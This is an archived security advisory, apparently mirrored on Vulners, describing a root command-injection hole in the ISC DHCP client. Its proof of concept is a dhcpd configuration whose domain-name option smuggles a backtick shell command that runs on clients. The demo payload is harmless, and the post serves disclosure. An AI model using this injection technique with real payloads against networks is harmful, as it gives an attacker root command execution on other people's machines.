Lucene search
K

isc-dhcpd.exploit.txt

🗓️ 27 Jun 2000 00:00:00Reported by Todd T. FriesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Possible root exploit discovered in ISC DHCP client affecting local network configurations.

Code
`Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP  
client.  
  
I can confirm that as of 6:23am on June 23rd after several hours of  
hacking around the sources I had the following dhcpd config running on my  
own machine's private network for testing:  
  
shared-network LOCAL-NET {  
option domain-name "my.`echo hi > /tmp/oops`.domain";  
option domain-name-servers 192.168.1.3, 192.168.1.5;  
  
subnet 192.168.1.0 netmask 255.255.255.0 {  
option routers 192.168.1.1;  
  
range 192.168.1.32 192.168.1.127;  
}  
}  
  
... and when dhclient finished running I had a nice little present  
in /tmp/ named 'oops' that contained the string 'hi' ..  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation